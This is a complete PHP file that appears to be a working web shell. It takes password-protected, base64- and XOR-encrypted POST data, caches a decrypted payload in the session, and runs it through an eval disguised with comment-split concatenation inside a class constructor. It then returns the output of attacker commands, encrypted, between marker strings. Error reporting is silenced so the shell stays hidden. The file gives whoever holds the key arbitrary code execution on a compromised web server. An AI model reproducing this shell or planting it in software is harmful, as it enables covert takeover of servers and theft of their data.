<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);

class aly{
    public function yh($xc,$app) {
        for($a=0;$a<strlen($xc);$a++) {
            $m = $app[$a+1&15];
            $xc[$a] = $xc[$a]^$m;
        }
        $bc=md5($xc);
        return $xc;
    }
}
$cmd='getBas'.'icsInfo';
$pass='admin';
$p='pay';
$key=substr(md5('admin123'),0,16);
$kk=$p.'load';
if (isset($_POST[$pass])){
    $app = new aly;
    $data=$app->yh(base64_decode($_POST[$pass]),substr(md5('admin123'),0,16));
    if (isset($_SESSION[$kk])){
        $xx=$app->yh($_SESSION[$kk],substr(md5('admin123'),0,16));
        $payl=$xx;
        if (strpos($payl,$cmd)===0){
            $payl=$app->yh($payl,substr(md5('admin123'),0,16));
        }
        $uu=$payl;
        class MOL{
            public function __construct($p) {   
        $qq=null;
        $dd=null;
        @eval($qq./*xxx*/$p./*ssss*/$dd);
        }
        }
        @new MOL($uu); 
        print substr(md5($pass.substr(md5('admin123'),0,16)),0,16);
        print base64_encode($app->yh(@run($data),substr(md5('admin123'),0,16)));
        print substr(md5($pass.substr(md5('admin123'),0,16)),16);
    }else{
        if (strpos($data,$cmd)!==0){
            $_SESSION[$kk]=$app->yh($data,substr(md5('admin123'),0,16));
        }
    }
}